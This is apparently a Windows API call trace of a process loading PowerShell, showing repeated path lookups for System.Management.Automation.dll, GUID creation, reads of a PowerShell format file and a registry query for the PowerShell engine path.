	[0676.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.671] VirtualQuery (in: lpAddress=0x26b1c0, lpBuffer=0x26c080, dwLength=0x30 | out: lpBuffer=0x26c080*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0676.673] VirtualQuery (in: lpAddress=0x26b250, lpBuffer=0x26c110, dwLength=0x30 | out: lpBuffer=0x26c110*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0676.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.674] VirtualQuery (in: lpAddress=0x26b9d0, lpBuffer=0x26c890, dwLength=0x30 | out: lpBuffer=0x26c890*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0676.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.676] VirtualQuery (in: lpAddress=0x26b9d0, lpBuffer=0x26c890, dwLength=0x30 | out: lpBuffer=0x26c890*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0676.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.678] VirtualQuery (in: lpAddress=0x26b9d0, lpBuffer=0x26c890, dwLength=0x30 | out: lpBuffer=0x26c890*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0676.679] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x44b19827, Data2=0xc641, Data3=0x4de6, Data4=([0]=0x8a, [1]=0x4, [2]=0x14, [3]=0x94, [4]=0x20, [5]=0x12, [6]=0x5, [7]=0x79))) returned 0x0
	[0676.683] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x2c912b5e, Data2=0xfd05, Data3=0x4ca4, Data4=([0]=0x86, [1]=0x7d, [2]=0xc7, [3]=0xa1, [4]=0x35, [5]=0xde, [6]=0xda, [7]=0x30))) returned 0x0
	[0676.684] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xc96a526f, Data2=0x334, Data3=0x4f66, Data4=([0]=0x96, [1]=0x49, [2]=0x55, [3]=0x44, [4]=0x63, [5]=0x97, [6]=0xd2, [7]=0xb))) returned 0x0
	[0678.547] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xe0fe23f4, Data2=0x1597, Data3=0x4b02, Data4=([0]=0x85, [1]=0x73, [2]=0x38, [3]=0xd3, [4]=0x6f, [5]=0x88, [6]=0xec, [7]=0x3d))) returned 0x0
	[0678.548] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x29129044, Data2=0xcadc, Data3=0x43ac, Data4=([0]=0xac, [1]=0x39, [2]=0x1e, [3]=0x11, [4]=0xf2, [5]=0xbb, [6]=0xb3, [7]=0x4f))) returned 0x0
	[0678.548] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x8473c23f, Data2=0x2d68, Data3=0x4d96, Data4=([0]=0x88, [1]=0xa3, [2]=0x72, [3]=0x11, [4]=0x49, [5]=0x60, [6]=0xd3, [7]=0xce))) returned 0x0
	[0678.549] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xd1f795d6, Data2=0x905, Data3=0x4f4e, Data4=([0]=0xb6, [1]=0x49, [2]=0x2a, [3]=0xff, [4]=0x96, [5]=0x6b, [6]=0xa1, [7]=0xe0))) returned 0x0
	[0678.549] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x2289cfe1, Data2=0x3372, Data3=0x4487, Data4=([0]=0xb3, [1]=0x6a, [2]=0x79, [3]=0xb5, [4]=0x9, [5]=0x35, [6]=0xa4, [7]=0x1d))) returned 0x0
	[0678.549] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xcfcc7e2d, Data2=0xae8, Data3=0x4527, Data4=([0]=0xb3, [1]=0xf, [2]=0x4e, [3]=0x72, [4]=0x2e, [5]=0x85, [6]=0xd, [7]=0x6b))) returned 0x0
	[0678.549] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x53165007, Data2=0xd450, Data3=0x466c, Data4=([0]=0x80, [1]=0x4, [2]=0xbd, [3]=0xf5, [4]=0x19, [5]=0xd4, [6]=0xf3, [7]=0x8))) returned 0x0
	[0678.549] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x13445759, Data2=0xe9f8, Data3=0x4ddc, Data4=([0]=0x86, [1]=0x99, [2]=0x66, [3]=0x4, [4]=0x15, [5]=0x87, [6]=0x2e, [7]=0x99))) returned 0x0
	[0678.550] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x43c67b24, Data2=0x722, Data3=0x4ce0, Data4=([0]=0x86, [1]=0x1f, [2]=0x3d, [3]=0x3, [4]=0x5d, [5]=0x15, [6]=0x84, [7]=0xe8))) returned 0x0
	[0678.552] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xa98643bf, Data2=0x932d, Data3=0x4c8c, Data4=([0]=0xaf, [1]=0x5a, [2]=0xb6, [3]=0x6e, [4]=0x12, [5]=0xea, [6]=0x4b, [7]=0x74))) returned 0x0
	[0678.562] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xb10c4ea2, Data2=0xab, Data3=0x4257, Data4=([0]=0x97, [1]=0xa0, [2]=0xfc, [3]=0xc0, [4]=0x70, [5]=0xbd, [6]=0xb1, [7]=0x57))) returned 0x0
	[0678.567] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xdd3263fa, Data2=0xb8dc, Data3=0x43b9, Data4=([0]=0x97, [1]=0x8a, [2]=0x5d, [3]=0x37, [4]=0xde, [5]=0x1c, [6]=0x8a, [7]=0xa7))) returned 0x0
	[0678.567] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x49920539, Data2=0xa104, Data3=0x4c1b, Data4=([0]=0xa0, [1]=0xb2, [2]=0x0, [3]=0x85, [4]=0xce, [5]=0xce, [6]=0xc, [7]=0x67))) returned 0x0
	[0678.567] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xcc26e9b9, Data2=0xd2c5, Data3=0x4623, Data4=([0]=0xa9, [1]=0xc9, [2]=0x62, [3]=0xb0, [4]=0xb4, [5]=0xd5, [6]=0xe1, [7]=0xa1))) returned 0x0
	[0678.568] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xc63f7dd9, Data2=0x8cc8, Data3=0x463f, Data4=([0]=0x80, [1]=0xc0, [2]=0x1b, [3]=0x7, [4]=0x39, [5]=0xab, [6]=0xa9, [7]=0xb))) returned 0x0
	[0678.569] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xa253bef7, Data2=0x1c8b, Data3=0x4d29, Data4=([0]=0xb2, [1]=0x89, [2]=0xf7, [3]=0x14, [4]=0x51, [5]=0xe1, [6]=0x5e, [7]=0xf6))) returned 0x0
	[0678.569] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x71273c28, Data2=0xedd8, Data3=0x457a, Data4=([0]=0xb0, [1]=0x1e, [2]=0xca, [3]=0x8, [4]=0xbe, [5]=0x90, [6]=0xe0, [7]=0x9a))) returned 0x0
	[0678.570] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x4fad89d9, Data2=0xcb59, Data3=0x4082, Data4=([0]=0x91, [1]=0xdf, [2]=0xe2, [3]=0x5e, [4]=0x7e, [5]=0xe0, [6]=0xa8, [7]=0x5e))) returned 0x0
	[0678.570] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x4b4b23ad, Data2=0xb15a, Data3=0x4fb6, Data4=([0]=0x9f, [1]=0xa, [2]=0xa, [3]=0x7e, [4]=0xe4, [5]=0x2a, [6]=0xf0, [7]=0x33))) returned 0x0
	[0678.576] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0678.576] GetFileType (hFile=0x308) returned 0x1
	[0678.576] SetErrorMode (uMode=0x1) returned 0x1
	[0678.576] GetFileType (hFile=0x308) returned 0x1
	[0678.577] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0678.577] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0678.578] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0678.578] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0678.579] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0678.579] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0678.579] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0678.579] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0678.580] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.340] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.341] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.341] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.342] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.342] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.342] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.343] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.343] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.346] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.346] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.346] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.347] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.347] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0xe67, lpOverlapped=0x0) returned 1
	[0680.347] ReadFile (in: hFile=0x308, lpBuffer=0x345e3b7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345e3b7*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0680.347] ReadFile (in: hFile=0x308, lpBuffer=0x345ede8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345ede8*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0680.348] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf88 | out: phkResult=0x26cf88*=0x308) returned 0x0
	[0680.348] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cf0c, lpData=0x0, lpcbData=0x26cf08*=0x0 | out: lpType=0x26cf0c*=0x1, lpData=0x0, lpcbData=0x26cf08*=0x56) returned 0x0
	[0680.348] CoTaskMemAlloc (cb=0x5a) returned 0x1b8634a0
	[0680.348] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cedc, lpData=0x1b8634a0, lpcbData=0x26ced8*=0x56 | out: lpType=0x26cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ced8*=0x56) returned 0x0
	[0680.348] CoTaskMemFree (pv=0x1b8634a0) 
	[0680.348] RegCloseKey (hKey=0x308) returned 0x0
